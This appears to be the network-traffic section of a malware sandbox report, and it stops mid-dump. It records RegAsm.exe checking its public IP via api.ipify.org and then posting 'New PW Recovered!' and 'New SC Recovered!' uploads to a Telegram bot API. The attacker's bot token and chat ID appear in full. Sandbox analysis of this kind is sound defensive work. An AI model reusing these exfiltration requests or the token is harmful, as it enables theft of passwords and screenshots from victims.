                                                May 24, 2024 07:44:07.187962055 CEST44349716149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:07.188036919 CEST44349716149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:07.189258099 CEST49716443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:07.193382025 CEST49716443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:09.302792072 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:09.302818060 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:09.308753967 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:09.310936928 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:09.310946941 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:09.943202972 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:09.945810080 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:09.945818901 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:10.263638973 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:10.264029980 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:10.264065027 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:10.264137983 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:10.264158964 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:10.264225960 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:10.264283895 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:10.630841017 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:10.630930901 CEST44349717149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:10.630980968 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:10.631525993 CEST49717443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:14.439094067 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:14.439125061 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:14.439188004 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:14.439553976 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:14.439565897 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.085608959 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.094504118 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:15.094517946 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.438172102 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:15.438200951 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.438941002 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:15.438960075 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.439116001 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:15.439129114 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.440087080 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.625566006 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:15.802764893 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.804842949 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:15.804935932 CEST44349718149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:15.805001974 CEST49718443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:23.453295946 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:23.453344107 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:23.454018116 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:23.457222939 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:23.457236052 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.095577955 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.102500916 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.102529049 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.106790066 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.149194002 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.149204016 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.149640083 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.153261900 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.198492050 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.399887085 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.400443077 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.400465012 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.400542021 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.400557041 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.400624037 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.400697947 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.400950909 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.400954962 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.754462957 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.755225897 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:24.755322933 CEST44349719149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:24.755374908 CEST49719443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:50.598938942 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:50.598984003 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:50.599055052 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:50.599455118 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:50.599473000 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.224117041 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.224280119 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:51.226797104 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:51.226807117 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.227207899 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.230803013 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:51.274502993 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.536073923 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.536441088 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:51.536478043 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.537039042 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:51.537064075 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.537178993 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:51.537384033 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.892796040 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.893527031 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:51.893626928 CEST44349720149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:51.893793106 CEST49720443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:53.592636108 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:53.592700005 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:53.593113899 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:53.593113899 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:53.593153000 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.213586092 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.213649035 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.215715885 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.215723991 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.215981960 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.217485905 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.258511066 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.531167030 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.531474113 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.531502008 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.531598091 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.531646967 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.531697989 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.531759977 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.531805992 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.874990940 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.875539064 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:54.875597954 CEST44349721149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:54.875653028 CEST49721443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:59.874799967 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:59.874838114 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:59.878998041 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:59.882798910 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:59.882812023 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.564249992 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.564331055 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.566147089 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.566159010 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.566418886 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.567888975 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.610534906 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.902276993 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.902671099 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.902705908 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.902731895 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.902746916 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.902762890 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.902770042 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.902817965 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.902829885 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.902882099 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.902894020 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:00.902932882 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:00.902940989 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:01.258392096 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:01.258512020 CEST44349722149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:01.258941889 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:01.258941889 CEST49722443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:03.082118988 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:03.082159042 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:03.082222939 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:03.082585096 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:03.082601070 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:03.755737066 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:03.762801886 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:03.762834072 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.065454960 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.066067934 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:04.066123009 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.066278934 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:04.066307068 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.066420078 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:04.066451073 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.412792921 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.413539886 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:04.413613081 CEST44349723149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:04.413676023 CEST49723443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.310378075 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.310424089 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.315073013 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.315253973 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.315272093 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.959429979 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.959616899 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.975219011 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:05.975264072 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.975640059 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:05.982634068 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.030509949 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.312956095 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.313478947 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.313533068 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.313637972 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.313661098 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.313803911 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.313819885 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.675045967 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.675539017 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:06.675607920 CEST44349724149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:06.675661087 CEST49724443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947494984 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947526932 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:16.947632074 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947957993 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:16.947973013 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.581306934 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.581403017 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.584059954 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.584069014 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.584980965 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.586589098 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.630521059 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904057980 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904475927 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.904510975 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904735088 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.904763937 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:17.904877901 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:17.905107021 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:18.268871069 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:18.268950939 CEST44349725149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:18.269128084 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:18.272533894 CEST49725443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.047265053 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.047302961 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:22.047369957 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.048455954 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.048475027 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:22.694164991 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:22.696106911 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:22.696124077 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.014787912 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.015530109 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:23.015553951 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.015711069 CEST49726443192.168.2.7149.154.167.220
                                                May 24, 2024 07:45:23.015726089 CEST44349726149.154.167.220192.168.2.7
                                                May 24, 2024 07:45:23.015970945 CEST49726443192.168.2.7149.154.167.220
                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                 May 24, 2024 07:41:23.909960032 CEST | 61092 | 53 | 192.168.2.7 | 1.1.1.1
                                                 May 24, 2024 07:41:23.918042898 CEST | 53 | 61092 | 1.1.1.1 | 192.168.2.7
                                                 May 24, 2024 07:41:26.341392994 CEST | 51294 | 53 | 192.168.2.7 | 1.1.1.1
                                                 May 24, 2024 07:41:26.350857019 CEST | 53 | 51294 | 1.1.1.1 | 192.168.2.7
                                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                 May 24, 2024 07:41:23.909960032 CEST | 192.168.2.7 | 1.1.1.1 | 0xb4d5 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                 May 24, 2024 07:41:26.341392994 CEST | 192.168.2.7 | 1.1.1.1 | 0x8ba5 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                 May 24, 2024 07:41:23.918042898 CEST | 1.1.1.1 | 192.168.2.7 | 0xb4d5 | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                 May 24, 2024 07:41:23.918042898 CEST | 1.1.1.1 | 192.168.2.7 | 0xb4d5 | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                 May 24, 2024 07:41:23.918042898 CEST | 1.1.1.1 | 192.168.2.7 | 0xb4d5 | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                 May 24, 2024 07:41:26.350857019 CEST | 1.1.1.1 | 192.168.2.7 | 0x8ba5 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                • api.ipify.org
                                                • api.telegram.org
                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 0 | 192.168.2.7 | 49699 | 104.26.13.205 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 2024-05-24 05:41:24 UTC | 155 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                 2024-05-24 05:41:24 UTC | 211 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 24 May 2024 05:41:24 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 888af4dcca3c423b-EWR
                                                 2024-05-24 05:41:24 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                                                Data Ascii: 8.46.123.175


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 1 | 192.168.2.7 | 49700 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 2024-05-24 05:41:27 UTC | 260 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc7b929ff59cb4
                                                Host: api.telegram.org
                                                Content-Length: 980
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                 2024-05-24 05:41:27 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                 2024-05-24 05:41:27 UTC | 980 | OUT | Data Ascii: -----------------------------8dc7b929ff59cb4Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc7b929ff59cb4Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/24/2024 01:41:25User
                                                 2024-05-24 05:41:27 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:41:27 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 2 | 192.168.2.7 | 49707 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 2024-05-24 05:43:05 UTC | 238 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc88931a5d0108
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                 2024-05-24 05:43:05 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                 2024-05-24 05:43:05 UTC | 1024 | OUT | Data Ascii: -----------------------------8dc88931a5d0108Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc88931a5d0108Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/09/2024 14:37:28User
                                                 2024-05-24 05:43:05 UTC | 50 | OUT | Data Ascii: -----------------------------8dc88931a5d0108--
                                                 2024-05-24 05:43:05 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:05 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 3 | 192.168.2.7 | 49709 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 2024-05-24 05:43:20 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc90cd1e5e4e83
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                 2024-05-24 05:43:21 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                 2024-05-24 05:43:21 UTC | 1024 | OUT | Data Ascii: -----------------------------8dc90cd1e5e4e83Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc90cd1e5e4e83Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/20/2024 01:52:59User
                                                 2024-05-24 05:43:21 UTC | 50 | OUT | Data Ascii: -----------------------------8dc90cd1e5e4e83--
                                                 2024-05-24 05:43:21 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:21 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 4 | 192.168.2.7 | 49710 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 2024-05-24 05:43:37 UTC | 238 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9817b6b6812f
                                                Host: api.telegram.org
                                                Content-Length: 70703
                                                Expect: 100-continue


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 5 | 192.168.2.7 | 49711 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 2024-05-24 05:43:38 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9a12c02f0750
                                                Host: api.telegram.org
                                                Content-Length: 70703
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                 2024-05-24 05:43:38 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                 2024-05-24 05:43:38 UTC | 1024 | OUT | Data Ascii: -----------------------------8dc9a12c02f0750Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc9a12c02f0750Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/01/2024 21:14:08User
                                                2024-05-24 05:43:38 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
